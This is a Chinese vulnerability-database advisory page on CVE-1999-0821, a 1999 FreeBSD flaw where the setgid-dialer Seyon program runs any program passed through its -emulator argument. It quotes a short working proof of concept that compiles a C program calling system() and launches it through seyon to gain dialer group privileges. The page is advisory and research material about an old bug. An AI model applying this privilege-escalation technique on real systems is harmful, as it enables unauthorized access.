FreeBSD Seyon 设置组标识符拨号器漏洞

FreeBSD Seyon 设置组标识符拨号器漏洞

漏洞ID 1105628 漏洞类型 配置错误
发布时间 1999-12-01 更新时间 2005-10-20
图片[1]-FreeBSD Seyon 设置组标识符拨号器漏洞-安全小百科CVE编号 CVE-1999-0821
图片[2]-FreeBSD Seyon 设置组标识符拨号器漏洞-安全小百科CNNVD-ID CNNVD-199911-029
漏洞平台 FreeBSD CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/19651
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199911-029
|漏洞详情
FreeBSDseyon存在漏洞。本地用户可以通过在-emulator参数中加入恶意程序来获得权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/838/info

FreeBSD 3.3-RELEASE ships with Seyon, a communications program which is known to have several vulnerabilities which can allow for a malicious user to elevate priviliges. The vulnerability, however, is that seyon is still installed setgid dialer in FreeBSD. When seyon is exploited, a local user can grant him/herself priviliges which allow access to the communications devices or anything else accessable by the group dialer. 

One of the methods to exploit seyon is shown below:

bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c
bash-2.03$ gcc -o id id.c
bash-2.03$ seyon -emulator ./id
uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)
|参考资料

来源:BID
名称:838
链接:http://www.securityfocus.com/bid/838

相关推荐: Caudium Remote Denial Of Service Vulnerability

Caudium Remote Denial Of Service Vulnerability 漏洞ID 1097661 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2004-10-30 更新时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享